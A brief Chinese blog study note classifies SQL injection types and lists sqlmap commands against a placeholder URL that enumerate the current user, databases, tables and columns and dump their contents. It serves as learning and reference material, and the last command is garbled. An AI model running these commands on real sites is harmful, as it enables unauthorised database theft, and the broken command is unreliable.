SQL注入

2018-04-24 本文已影响0人豆豆_50dd

SQL分类：

按照数据类型分类：
>整形注入
>字符型注入
按照注入语法分类

>UNION query SQL injection（可联合查询注入）
>Error-based SQL injection（报错型注入）
> Boolean-based blind SQL injection（布尔型注入）
>Time-based blind SQL injection（基于时间延迟注入）
>Stacked queries SQL injection （可多语句查询注入0）

按照数据提交方式分类
> post
> get
> cookie
按照数据库类型分类
> php+mysql
> asp+access
> asp+ orecal
SQLMAP常用命令：

#获取当前用户名称:
sqlmap.py -u "http://xx.com/new?id=1" --current-user
#获取当前数据库名称:
sqlmap.py -u "http://xx.com/new?id=1" --current-db
#列表名:
sqlmap.py -u "http://xx.com/new?id=1" --tables -D “db_name”
#列字段:
sqlmap.py -u "http://xx.com/new?id=1" --columns -T "tablename" -D "db_name"
#获取字段内容:
sqlmap.py -u "http://xx.com/new?id=1" --current-dbtablename" --dump -C "column_name" -T "tablename" -D "db-name"

上一篇下一篇

猜你喜欢

热点阅读